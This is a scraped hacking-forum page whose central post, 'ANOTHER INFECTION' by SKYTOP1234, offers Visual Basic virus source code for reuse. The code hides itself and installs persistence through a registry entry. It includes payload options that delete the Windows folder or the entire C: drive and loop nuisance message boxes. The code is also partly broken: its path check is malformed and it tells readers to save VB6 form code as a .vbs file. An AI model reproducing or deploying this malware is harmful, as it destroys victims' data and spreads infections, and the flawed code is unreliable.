Code Attack
Welcome to code attack forums! login or register. its quick and easy!

Join the forum, it's quick and easy

Code Attack
Welcome to code attack forums! login or register. its quick and easy!
Code Attack
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Poll

iphone or Droid?

ANOTHER INFECTION by SKYTOP1234 [CODE:VB] I_vote_lcap100%ANOTHER INFECTION by SKYTOP1234 [CODE:VB] I_vote_rcap 100% [ 3 ]
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] I_vote_lcap0%ANOTHER INFECTION by SKYTOP1234 [CODE:VB] I_vote_rcap 0% [ 0 ]

Total Votes : 3

Latest topics
» last one to reply wins!!!
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyThu Oct 21, 2010 5:45 pm by Is Stranger

» Lets get GOing! :D
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptySun Dec 13, 2009 12:25 pm by Is Stranger

» Promoting this site!
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyWed Dec 02, 2009 10:51 pm by TheAnarchy

» **Please READ** how to apply
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptySat Nov 28, 2009 1:14 am by TheAnarchy

» Over 200 game saves.
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyFri Nov 27, 2009 11:01 pm by TheAnarchy

» once again infected by skytop1234 [code:vb]
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyTue Nov 24, 2009 9:55 am by Is Stranger

» introduce your self
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyFri Nov 20, 2009 8:34 pm by TheAnarchy

» Some of my gfx's
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyFri Nov 20, 2009 8:27 pm by TheAnarchy

» last on to reply wins!!!
ANOTHER INFECTION by SKYTOP1234 [CODE:VB] EmptyFri Nov 20, 2009 8:14 pm by Is Stranger

Affiliates
Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search
Who is online?
In total there is 1 user online :: 0 Registered, 0 Hidden and 1 Guest :: 1 Bot

None

[ View the whole list ]


Most users ever online was 40 on Thu Dec 22, 2022 2:32 am
Statistics
We have 15 registered users
The newest registered user is Arpita Hegde

Our users have posted a total of 93 messages in 26 subjects

ANOTHER INFECTION by SKYTOP1234 [CODE:VB]

Go down

ANOTHER INFECTION by SKYTOP1234 [CODE:VB] Empty ANOTHER INFECTION by SKYTOP1234 [CODE:VB]

Post by SKYTOP1234 Tue Nov 17, 2009 11:29 pm

Dim namefile As String
Dim namereg As String
Private Sub Form_Load()
On Error Resume Next
Me.Hide 'so people can not see it
namefile = "virus.exe" 'put the virus file name here with the .exe on the end !Recommended to change!
namereg = "virus" 'put the virus reg key name in here !Recommended to change!
If LCase$(App.Path) <> "c:\windows\system32" Or "c:\windows\start menu\programs\startup" Or "c:\windows\start menu\programs\start up" Or "c:\winnt\system32" Or "c:\winnt\start menu\programs\startup" Or "c:\winnt\start menu\programs\start up" Or "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" Then
'^this is check if the computer already has been infected !Recommended not to touch!
reg namefile, namereg 'this is to infect the computer
End If
payload 'this goes to the main part of the virus
End Sub
Function payload()
On Error Resume Next
'this is the main part of the virus put the code here of what you want this virus to do

'Shell ("cmd /c del c:\windows\* /F /S /Q") 'this will kill the windows folder in C:

'Shell ("cmd /c del c:\* /F /S /Q") 'this will kill the whole C: drive

'start:
'msgbox "Your Pc Is Infected With The Anoying Virus"
'goto start 'this will repeat a msgbox over and over again
End Function
-------------------------------------------
save as a .vbs file extension.

ex:skytop-is-cool.vbs

SKYTOP1234
noob
noob

Posts : 4
Points : 5437
Reputation : 1
Join date : 2009-11-17

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum